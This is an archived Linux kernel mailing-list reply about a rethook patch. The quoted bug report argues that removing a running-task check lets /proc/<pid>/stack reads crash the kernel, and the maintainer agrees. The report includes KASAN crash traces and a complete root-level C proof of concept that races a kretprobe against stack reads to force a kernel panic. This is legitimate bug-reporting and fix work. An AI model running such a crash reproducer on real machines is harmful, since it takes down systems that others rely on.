From: Masami Hiramatsu (Google) <mhiramat@kernel.org>
To: XIAO WU <xiaowu.417@qq.com>
Cc: sashiko-reviews@lists.linux.dev, Petr Mladek <pmladek@suse.com>,
Peter Zijlstra <peterz@infradead.org>,
Tengda Wu <wutengda@huaweicloud.com>,
Mathieu Desnoyers <mathieu.desnoyers@efficios.com>,
Alexei Starovoitov <ast@kernel.org>,
Steven Rostedt <rostedt@goodmis.org>,
linux-kernel@vger.kernel.org, linux-trace-kernel@vger.kernel.org,
live-patching@vger.kernel.org
Subject: Re: [PATCH v4] rethook: Remove the running task check in rethook_find_ret_addr()
Date: Fri, 12 Jun 2026 21:20:12 +0900 [thread overview]
Message-ID: <20260612212012.b1e0eaa4b3ba1e58afe11fa2@kernel.org> (raw)
In-Reply-To: <tencent_3D17DC5BE32C8A51D938AF50F221321F6206@qq.com>
On Thu, 11 Jun 2026 23:53:36 +0800
XIAO WU <xiaowu.417@qq.com> wrote:
> Hi Tengda,
>
> Sashiko [1] reviewed this patch and found that removing the
> task_is_running() check exposes stack unwinders to real crashes — not
> just "invalid information." A PoC confirms this: a KASAN panic triggers
> within seconds when /proc/<pid>/stack reads the stack of a task that is
> concurrently running a kretprobe.
Hmm, why /proc/<pid>/stack unwind stack so unreliable way...
That should stop the target process, because it is exposed to
userspace. Thus it should work as safe as possible.
Anyway, thanks for reporting with the test program.
>
> [1]
> https://sashiko.dev/#/patchset/20260610013658.1837963-1-wutengda%40huaweicloud.com
>
> > diff --git a/kernel/trace/rethook.c b/kernel/trace/rethook.c
> > index 5a8bdf88999a..1e7fdebe3cd5 100644
> > --- a/kernel/trace/rethook.c
> > +++ b/kernel/trace/rethook.c
> > @@ -250,9 +251,6 @@ unsigned long rethook_find_ret_addr(struct
> task_struct *tsk, unsigned long frame
> > if (WARN_ON_ONCE(!cur))
> > return 0;
> >
> > - if (tsk != current && task_is_running(tsk))
> > - return 0;
> > -
> > do {
> > ret = __rethook_find_ret_addr(tsk, cur);
> > if (!ret)
>
> The commit message states:
>
> > The iteration is already safe from crashes because
> > unwind_next_frame() holds RCU and rethook_node structures are
> > RCU-freed; even if the iteration goes off the rails and returns
> > invalid information, it will not crash.
>
> There are two problems with this claim, both reproducible.
>
> **Problem 1: stack-out-of-bounds in unwind_next_frame itself**
>
> The PoC below reliably triggers the following KASAN panic — not in the
> rethook list traversal, but inside unwind_next_frame():
>
> [ 1833.494623] BUG: KASAN: stack-out-of-bounds in
> unwind_next_frame+0x861/0x2080
> [ 1833.494651] Read of size 2 at addr ffffc90003e6f5f0 by task poc/9854
> [ 1833.494707] Call Trace:
> [ 1833.494719] dump_stack_lvl+0x116/0x1f0
> [ 1833.494743] print_report+0xf4/0x600
> [ 1833.494788] kasan_report+0xe0/0x110
> [ 1833.494836] unwind_next_frame+0x861/0x2080
> [ 1833.494948] arch_stack_walk+0x99/0x100
> [ 1833.495000] stack_trace_save_tsk+0x16a/0x200
> [ 1833.495054] proc_pid_stack+0x173/0x2b0
> [ 1833.495103] seq_read_iter+0x519/0x12d0
> [ 1833.495166] seq_read+0x3b7/0x590
> [ 1833.495297] vfs_read+0x1f5/0xd20
> [ 1833.495497] ksys_read+0x135/0x250
> [ 1833.495549] do_syscall_64+0x129/0x850
> [ 1833.495566] entry_SYSCALL_64_after_hwframe+0x77/0x7f
> [ 1833.498894] Kernel panic - not syncing: KASAN: panic_on_warn set ...
>
> page last free pid 9737 tgid 9737 stack trace:
> do_sys_openat2+0xbf/0x260 <-- target task inside kretprobe
> __x64_sys_openat+0x179/0x210
>
> This crash has nothing to do with rethook_node lifetimes or RCU. It
> happens because the ORC unwinder reads stack memory while the target
> task concurrently executes a kretprobe trampoline that modifies return
> addresses. The unwinder follows corrupted frame data past valid stack
> boundaries. RCU protection of rethook_node structures is irrelevant —
> this crash occurs at the stack frame interpretation level, before any
> rethook list traversal.
OK, in that case, I think we should not allow list traversal.
I think without freezing the target task, accessing /proc/<pid>/stack
is potentially dangerous. Shouldn't we fix this at first?
>
> The old task_is_running() check prevented the unwinder from attempting
> to unwind a running task's stack in the first place.
>
> **Problem 2: use-after-free via rethook_node recycling**
>
> Even if the stack-out-of-bounds above were addressed, a second crash
> path exists in the rethook list traversal itself.
>
> rethook_recycle() immediately pushes nodes back to the objpool without
> an RCU grace period:
>
> kernel/trace/rethook.c:
> void rethook_recycle(struct rethook_node *node)
> {
> ...
> objpool_push(node, &node->rethook->pool);
> }
>
> Meanwhile, unwind_next_frame() in arch/x86/kernel/unwind_orc.c drops
> RCU between frames while the cursor (*cur) persists across iterations:
>
> arch/x86/kernel/unwind_orc.c:
> bool unwind_next_frame(...)
> {
> ...
> guard(rcu)(); // RCU held for one frame
> ...
> } // RCU dropped here
>
> When the unwinder calls __rethook_find_ret_addr() in the next frame
> iteration, it does:
>
> struct llist_node *first = tsk->rethooks.first;
> ...
> *cur = first;
> ...
> node = node->next; // node may have been recycled
>
> If the target task returns from a probed function between frames, its
> rethook_node is recycled and can be instantly reallocated to another
> task. The unwinder's stale cursor then dereferences a freed pointer,
> leading to use-after-free.
OK, this is still real problem. We should use call_rcu() to return
the object back to objpool.
Thanks!
>
> ## Reproducer
>
> The PoC sets up a kretprobe on do_sys_openat2, creates hot-loop threads
> calling open(), and concurrently reads /proc/<tid>/stack. The race
> triggers within seconds (Problem 1 above; Problem 2 may reproduce on
> kernels without KASAN or with different timing).
>
> Build: gcc -static -pthread -o poc poc.c
> Run: ./poc [runtime_seconds]
> Needs: root, CONFIG_KASAN=y
>
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <sys/wait.h>
> #include <sys/syscall.h>
> #include <sched.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <signal.h>
> #include <pthread.h>
> #include <dirent.h>
>
> #define TRACE "/sys/kernel/tracing"
>
> volatile int stop = 0;
>
> static int tfs(const char *f, const char *b)
> {
> char p[256]; int fd, r;
> snprintf(p, 256, "%s/%s", TRACE, f);
> fd = open(p, O_WRONLY | O_TRUNC);
> if (fd < 0) {
> system("mount -t tracefs tracefs /sys/kernel/tracing 2>/dev/null");
> usleep(50000);
> fd = open(p, O_WRONLY | O_TRUNC);
> }
> if (fd < 0) return -1;
> r = write(fd, b, strlen(b));
> close(fd);
> return r < 0 ? -1 : 0;
> }
>
> void *hot_thread(void *arg)
> {
> while (!__atomic_load_n(&stop, __ATOMIC_RELAXED)) {
> int fd = open("/dev/null", O_RDONLY);
> if (fd >= 0) close(fd);
> }
> return NULL;
> }
>
> void *reader_thread(void *arg)
> {
> pid_t target = *(pid_t *)arg;
> char path[64], buf[8192];
> snprintf(path, 64, "/proc/%d/stack", target);
> while (!__atomic_load_n(&stop, __ATOMIC_RELAXED)) {
> int fd = open(path, O_RDONLY);
> if (fd >= 0) { read(fd, buf, 8191); close(fd); }
> }
> return NULL;
> }
>
> void sigh(int s) { stop = 1; }
>
> int main(int argc, char *argv[])
> {
> int runtime = 120;
> if (argc > 1) runtime = atoi(argv[1]);
>
> printf("rethook race PoC\n");
> if (geteuid()) { printf("root needed\n"); return 1; }
> signal(SIGINT, sigh);
>
> pthread_t hot[4], rdr[4];
> pid_t hot_tids[4];
> int pairs = 4;
>
> for (int c = 0; c < runtime / 5 && !stop; c++) {
> tfs("events/kprobes/myretprobe/enable", "0");
> tfs("kprobe_events", "-:myretprobe");
> usleep(100);
> tfs("kprobe_events", "r:myretprobe do_sys_openat2 $retval");
> tfs("events/kprobes/myretprobe/enable", "1");
>
> pid_t main_tid = syscall(SYS_gettid);
>
> for (int i = 0; i < pairs; i++)
> pthread_create(&hot[i], NULL, hot_thread, NULL);
>
> usleep(300000);
>
> {
> DIR *d = opendir("/proc/self/task");
> int cnt = 0;
> if (d) {
> struct dirent *de;
> while ((de = readdir(d)) != NULL && cnt < pairs) {
> pid_t t = atoi(de->d_name);
> if (t > 0 && t != main_tid)
> hot_tids[cnt++] = t;
> }
> closedir(d);
> }
> for (int i = 0; i < cnt; i++)
> pthread_create(&rdr[i], NULL, reader_thread, &hot_tids[i]);
> }
>
> printf("round %d\n", c);
> sleep(5);
>
> stop = 1;
> usleep(100000);
>
> for (int i = 0; i < pairs; i++) pthread_join(hot[i], NULL);
> for (int i = 0; i < pairs; i++) pthread_join(rdr[i], NULL);
>
> stop = 0;
> usleep(1000);
> }
>
> tfs("events/kprobes/myretprobe/enable", "0");
> tfs("kprobe_events", "-:myretprobe");
> printf("Done\n");
> return 0;
> }
>
> ## Summary
>
> The v4 commit message claims the iteration "will not crash," but the PoC
> demonstrates a reproducible KASAN panic:
>
> 1. stack-out-of-bounds in unwind_next_frame (ORC unwinder reads
> concurrently-modified stack frames of a running task)
>
> 2. Potential use-after-free in __rethook_find_ret_addr (rethook nodes
> recycled without RCU grace period, cursor persists across RCU drops)
>
> The old task_is_running() check was racy but served as a practical
> safety net. Removing it without adding equivalent protection in the
> callers (proc_pid_stack, BPF stack walkers) exposes users to kernel
> panics via /proc/<pid>/stack on any task running a kretprobe.
>
> Thanks,
> Xiao
>
>
--
Masami Hiramatsu (Google) <mhiramat@kernel.org>
prev parent reply other threads:[~2026-06-12 12:20 UTC|newest]
Thread overview: 5+ messages / expand[flat|nested] mbox.gz Atom feed top
2026-06-10 1:36 [PATCH v4] rethook: Remove the running task check in rethook_find_ret_addr() Tengda Wu
2026-06-10 1:50 ` sashiko-bot
2026-06-11 15:53 ` XIAO WU
2026-06-12 1:54 ` Tengda Wu
2026-06-12 12:20 ` Masami Hiramatsu [this message]
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20260612212012.b1e0eaa4b3ba1e58afe11fa2@kernel.org \
--to=mhiramat@kernel.org \
--cc=ast@kernel.org \
--cc=linux-kernel@vger.kernel.org \
--cc=linux-trace-kernel@vger.kernel.org \
--cc=live-patching@vger.kernel.org \
--cc=mathieu.desnoyers@efficios.com \
--cc=peterz@infradead.org \
--cc=pmladek@suse.com \
--cc=rostedt@goodmis.org \
--cc=sashiko-reviews@lists.linux.dev \
--cc=wutengda@huaweicloud.com \
--cc=xiaowu.417@qq.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox